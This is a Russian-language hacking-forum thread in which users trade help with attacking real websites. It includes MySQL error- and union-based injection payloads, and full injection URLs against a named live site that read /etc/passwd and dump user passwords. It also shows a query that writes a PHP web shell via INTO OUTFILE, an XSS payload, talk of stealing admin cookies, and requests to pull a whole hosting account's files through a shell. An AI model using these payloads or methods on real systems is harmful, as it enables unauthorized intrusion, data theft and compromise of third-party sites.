вот это: Code: id=4+or(1,1)=(select+count(0),concat((select+versi on()+from+information_schema.tables+limit+0,1),flo or(rand(0)*2))from(information_schema.tables)group +by+2) замени на это: Code: id=(select+1+from+(select+count(0),concat((select+version()+from+information_schema.tables+limit+1),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)
Есть шелл, могу просматривать весь хостинг, по одному файлу много не выкачаю =). платформа Linux. Можно ли создать фтп пользователя через консоль? если да то как ето сделать? Есть ли другие варианты всее от туда стянуть? Bind port to и архивация не подходят!
Архивация не подходит! если больше двух метров архив то ошибка! да и свободного места там практические нет.
Вобще прощу помощи есть база данных от сайта, типа db_user, db_pass, db_host ну и т.д., Движок ДЛЕ, но шелла нет ( Подскажите можно ли как то взломать?
Подскажите плиз, точнее напишите мне пожалуйста самый примитивный скрипт с blind sql-inj. Я чёто начал писать, но ошибка выводиться токо при подстановки ковычек. помогит плиз PHP: <?php ... if(isset($_GET['type'])) { $response=mysql_query("SELECT * FROM news WHERE type='".$_GET['type']."'"); $result=mysql_fetch_array($response); } ... ?>
PHP: <?php ... if(isset($_GET['type'])) { $response=mysql_query("SELECT count(*) FROM news WHERE type='".$_GET['type']."'"); $result=mysql_fetch_array($response); } ... ?>
Люди, подскажите, есть доступ к mysql , рутовский как бы. но не знаю как залить шелл на сайт, посоветовали через запрос select '<?php eval(system($_GET[v]));?>' from mysql.user into outfile 'директория\фаил.пхп'; но не могу найти папку с правами на залив. что делать?
Почему не логиниться??? http://www.sflcn.com/admin выдрал логин пасс Попробуйте плиз. может у меня руки кривые
2 scorpic393 во-первых, не всегда данные из таблицы подойдут к админке( мб просто данные для входа в нее в другой таблице ) , во-вторых, в данном случае на админку стоит бейсик-авторизация, что в 90% случаев, означает, что пассворд хранится не в бд, а в файле .htpasswd такие дела
Вот таким образом выводится нужные мне значения но по одному, меняя лимит UNION SELECT * FROM(SELECT * FROM (SELECT NAME_CONST((SELECT password FROM user LIMIT 1), 14)d) as t JOIN(SELECT NAME_CONST((SELECT password FROM user LIMIT 1),14)e)b)a Каким образом можно вывести весь список сразу? intooutfile доступ запрещён для этого юзверя.
Нашел сайт с mssql injection. Перебираю таблицы, но с кодировкой что-то не то. Вроде стоит cp1252 Подставляю это значение в запрос Получаю тоже самое. Расшифровываю, получаю Запрос_Стадии_Клиент. Пихаю в запрос. Опять та же самая ошибка. Не знаю что делать дальше, помогите, пожалуйста.
Здрасти! Возникла проблема которую не могу решить даже после прочтения етого треда,множества FAQ по sql inj, sql cheat sheet'ов, мануалов, статей в Хакере и всего подобного. Вообщем дело обстоит так: inj: http://enjoy.md/category.php?id=2%27] http://enjoy.md/category.php?id=2' Доступ к БД осуществил, вытянуть удалось лишь логины и пассы пользователей сайта, найти логин и пасс админа в этой БД не удалось. В user_privileges - privilege_type-usage и is_grantable-no: http://enjoy.md/category.php?id=-6/**/union/**/select+1,2,concat_ws%280x3a,grantee,privilege_type,is_grantable%29+from+information_schema.user_privileges-- load_file выдает пустую страницу(что в hex, что в текст, что с aes_decrypt(aes_encrypt)): http://enjoy.md/category.php?id=-6/**/union/**/select+1,load_file%28%27etc/passwd%27%29,3--+ http://enjoy.md/category.php?id=-6/**/union/**/select+1,load_file%28%27home/vhosts/enjoy.md/public_html/index.php%27%29,3--+ инфа: version() - 5.1.37 mysql user()- '20121'@'localhost' database() - 20121_enjoy ещё нашел адмику: http://enjoy.md/admin/ и PMA: http://enjoy.md/phpmyadmin что интересно, вовсяком случае мне так показалось, так ето вот: http://enjoy.md/category.php?id=-2/**/union/**/select/**/1,2,table_schema+from+information_schema.tables+where+table_name=%27admin%27-- Не могу понять откуда эти БД взялись если при таком запросе их не видно: http://enjoy.md/category.php?id=-2/**/union/**/select/**/1,2,schema_name+from+information_schema.schemata-- Подключитьсяк ним никак не могу,есть ли способ и гдеж логин и пасс админа хранится тогда? в PMA и админке обойти авторизацию не вышло. Помогите додумать это плз, может совет какой дадите. На данный момент приходит в голову лишь кража кукисов, на сайте есть мыло и icq, с их помощью узнал ФИО админа,место работы, сделанные им сайты. Не приятно признавать но не охото мне с кукисами морочиться если есть другие варьянты дайте знать SiXSS(alert): http://enjoy.md/category.php?id=-2/**/union/**/select+1,2,0x3c7363726970743e616c657274282256756c6e65726162696c69747922293b3c2f7363726970743e%20-- Это может выглядить глупо но всё же: http://enjoy.md/category.php?id=6+or+1=if%28load_file%28%27/etc/passwd%27%29+is+not+NULL,1,2%29--+ значит всё же file_priv=Y? если я чёт намудрил плз исправьте доступа к file_priv непсредственно из mysql.users нету,даёт ошибку, как впрочем и к самой БД mysql: http://enjoy.md/category.php?id=-6/**/union/**/select+1,2,file_priv+from+mysql.users-- еще вопрос, почему пишет privilege_type-select is_grantable-no? Я же вовсю им орудую. Или это отнсится лишь к БД и их выбору? http://enjoy.md/category.php?id=-6/**/union/**/select+1,2,concat_ws%280x3a,privilege_type,is_grantable%29+from+information_schema.schema_privileges-- надеюсь я ниче не перепутал спс! кстати: @@datadir - /var/lib/mysql/ а при ошибке даёт другой путь: /home/vhosts/enjoy.md/public_html/category.php т.к. в моём случае заливка шелла не возможна по всей видимость просто прошу обьяснить какой именно путь указать при load_file
overcrookd в user есть login:admin password:666 может это и есть то самое? п.с ток всеравно логин иле pwd не подходит
естессно я первым делом проверил это, увы, это login и pwd для входа на сайт, не админку. всеоравно спасибо зв потраченое время
